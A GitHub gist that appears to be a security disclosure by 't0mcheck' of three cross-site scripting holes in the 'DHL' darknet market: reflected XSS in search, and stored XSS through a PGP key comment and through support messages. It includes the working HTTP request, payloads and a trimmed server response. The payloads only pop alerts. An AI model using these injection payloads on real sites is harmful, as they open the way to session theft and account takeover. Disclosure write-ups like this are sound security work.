Skip to content

Instantly share code, notes, and snippets.

/README.md

Created August 1, 2017 16:26
Show Gist options
  • Save anonymous/f38115e9e8318fda2f89961503f31777 to your computer and use it in GitHub Desktop.
Save anonymous/f38115e9e8318fda2f89961503f31777 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
README.md

DHL Market Security Vulnerabilities
Market Name DHL - Dark Heroes League
Date 1st August 2017
By t0mcheck
URL http://darkheroesq46awl.onion
Test Time 60 minutes
Access Level anonymous, regular buyer account
Disclosure Reported to support - full disc.

DHL - Darknet Heroes League is a darknet market

Table of Contents

  1. Vulnerability 1: Reflected XSS in Main Search
  2. Vulnerability 2: Persistent XSS in PGP key upload
  3. Vulnerability 3: Persistent XSS In Support Forum

Vulnerability 1: Reflected XSS in Main Search

XSS in main search field. Does not filter any characters

Request

GET /search?q=x00%22%3E%3Cimg%20src=/%20onerror%3djavascript%3aalert%28%27XSS%27%29%3E HTTP/1.1
Host: darkheroesq46awl.onion
Cookie: PHPSESSID=xxx; auth_hash=xxx
Connection: close

Response (trimmed)

<main class="main-content" role="main">
<h1>Search Results &mdash; x00'>
    <img src=/ onerror=javascript:alert('XSS')>
</h1>
<form action="search?q=x00">
    <img src=/ onerror=javascript:alert('XSS')>
    " method="GET">
    <input type='hidden' name='q' value='x00"><img src=/ onerror=javascript:alert('XSS')>
    '>
    <table class="product-filter-table">
    <thead>
        <tr>
        <th>Ships from...</th>
        <th>&nbsp;</th>
        </tr>
    </thead>

Screenshot

dhlvuln1

Vulnerability 2: Persistent XSS in PGP key upload

PGP key comments can contain HTML and Javascript and it isn't escaped

Example key

-----BEGIN PGP PUBLIC KEY BLOCK-----
Comment: </textarea><img src=/ onerror=javascript:alert(0)>

mQENBFmAoDIBCADjqpuqUDoshyULW6QHhN67/7JkYIL+tLUWCq/NEDVwSGQyv0jW
KQkU2JiHn8N0iDXcI6nB4eVTeR0LlsSqqmBcM42YMAoa0IkSB7+qKFDkYQcRCGO3
y50vdrGKtjeAe1uu9xKEfEhNIoXIh65VEM+xbFgD1RPw/GThnihxFqPh/HImw5rg
wQbnVJkrniXRhUK8oTHewUNcObA7VIYfnFxzp8sktx+GVeTAjiioOKhZfnwyH/nn
enb26MkDtjis5WA1TlrG5bRb0SH6fD2ZHI1o7DONxisOdpD+2vJxTg32GTchPLqW
eAta+KFrpbx19bDhHuv6vrY8EgUdJj+uHXpDABEBAAG0CXRvbWNoZWNrNIkBVAQT
AQoAPhYhBIZsQnY09qEgzACCAD0mcK72eCQBBQJZgKAyAhsDBQkDwmcABQsJCAcD
BRUKCQgLBRYCAwEAAh4BAheAAAoJED0mcK72eCQBkykH/iZim1IcII1VbDd++HLq
JWmczc6qgiVyQ07opgbcTSA3RHfyYWMtBdpsZcyHYUO+WHieJ3DOf8xHwVP3Y53c
8LN9mYKR4EEDlLcNTxkh2H9TlLz2rpuCCjswAw9kJrZKxKGb/5nhHTmOdZDxEJJe
lBvgBQ7/spNA1JechvvUKGtK16KX6z3AY/W8jKoy5sUze5oFloC67mc03p8weDHY
YnAeWElYW2VkvntSKudX/ilogNXrGb4GPYq/LDgdf2m/OYb1Ct4F6escaHt3BXZQ
ra4TpZUndez55E4pCN1Hr9abDE+bdNgsiHTPL6vMRj7/hOCAyKp+qLz0rBODPdzW
qYy5AQ0EWYCgMgEIALfZVizLJmexH7Or+t7B0cdKlY2rWspKXAcm9n4smcrklN3E
ACMzlsRbzxSOkL95kBkMn00DNonlnOZlsKi8uOFbURl3C+UxBacq4kzOawuxVkcu
X54F8Tljg5PN7wAdwfdNJCeS8GsvZKGB6aDyIDmNHTdcMPYxsnXqVZ6qZpaGyBPQ
EeAz5cetFWM6xGZvyfK62bCi4SuvHtVDPMGV/BuEO2swFLyDYKozi95cAOUrGsWc
VCIE5FwUln/0Iq/ZdXdrzjI4U99CdQqDKRM1cH1TfpKlWIUcz8oPxfnoExkRB1/G
prHvrMzNPouaJcC2H2U+WAgaznmKgQU0PUxhzVMAEQEAAYkBPAQYAQoAJhYhBIZs
QnY09qEgzACCAD0mcK72eCQBBQJZgKAyAhsMBQkDwmcAAAoJED0mcK72eCQBNBQI
ALZ1gBW9kBIzn8ibt621tN2JqXMYDxhUct8aubpTeEIp19Q++NCsT7uxSFOdy5X0
V8/lG47ra1QB5FNk0dDu0lHWLmhZY5FscWeLf26f7kNKtcpM3aGU6Yd2Bsk/bjCz
BzqZlN68NrcrYVT+6TZLJapTgOY3CO2ydaGDgP+cZ2AkYQYhDx5GZDsSNox8YbSV
IIprpkQUjk0hIEie0dM6+LdhayM3mXjeQXkjs2Zetkj/bR+JBqu7XHusYPBGzAPW
P1fS/vbUtDSeX8EBzyGsRRRhf8wjRfQxu6RHBfxyvi5+y2l8VMl9J9fkAIcL9oCp
swEpyrIlgfIPCtQuKuKwVmg=
=Hbet
-----END PGP PUBLIC KEY BLOCK-----

Screenshot

dhlvuln2

Vulnerability 3: Persistent XSS In Support Forum

While reporting the last two bugs to support I noticed that pasting in the vulnerable code triggered an XSS in the support forum.

To XSS support simply message them with:

</textarea><img src=/ onerror=javascript:alert(1)>

Screenshot:

vuln3

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment